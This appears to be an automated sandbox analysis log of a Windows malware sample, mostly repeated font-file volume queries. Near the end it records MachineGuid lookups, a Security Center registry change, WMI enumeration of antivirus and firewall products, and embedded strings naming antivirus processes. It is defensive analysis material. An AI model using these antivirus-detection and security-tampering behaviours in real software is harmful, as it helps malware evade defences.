                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: 4rC1bQcnl5.exe | Binary or memory string: bdagent.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: cmdagent.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: vsserv.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: cfp.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: avp.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: a2start.exe
Source: svchost.exe, 0000000D.00000002.494378144.0000016881F02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: a2guard.exe
Source: svchost.exe, 0000000D.00000002.494299228.0000016881E3D000.00000004.00000001.sdmp | Binary or memory string: $@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: a2service.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

